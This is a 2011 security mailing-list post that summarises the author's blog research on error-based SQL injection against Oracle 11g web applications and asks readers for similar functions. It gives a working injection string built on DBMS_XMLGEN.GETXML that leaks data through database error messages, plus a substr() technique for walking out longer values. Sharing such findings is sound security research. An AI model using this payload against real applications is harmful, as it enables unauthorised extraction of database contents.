Hello all, I wrote a blog post about exploitation via error based sql injection of an oracle 11g database based web application and I thought I may share it with the lists. In case anyone is interested the full blog post can be found in http://zqyves.wordpress.com/2011/07/24/error-based-sql-injection-in-oracle-11g/. To cut a long story short : 1) Oracle 11g has introduced the concept of access control on network related function ( by default they are only accessible by SYS ) so one cannot use utl_inaddr.get_host_name of utl_http.request and their derivatives to get data either in- or out-of-band respectively.. 2) A couple of other functions that are mentioned in http://www.red-database-security.com/wp/oracle_sql_injection_2009.pdf where either not accessible to me or not present in the supporting db. Researching in to the database I found one function that was both accessible and its output could be controlled by user input. This function is DBMS_XMLGEN.GETXML (more info on that here http://psoug.org/reference/dbms_xmlgen.html) and the following is a valid sql injection string: t' or '1'=to_char(select dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" from sys.dual') from sys.dual)-- The error output will be something in the form of ORA-00904 "SCOTT": invalid identifier. The caveat is that the returned data cannot be more than 30 characters long, but you can use substr() to control that and "walk" the desired value. Does anyone know of other functions and what rights do they need eg. available to PUBLIC whose output can be controlled and used in an error based sql injection scenario? Best regards, ./Zacharias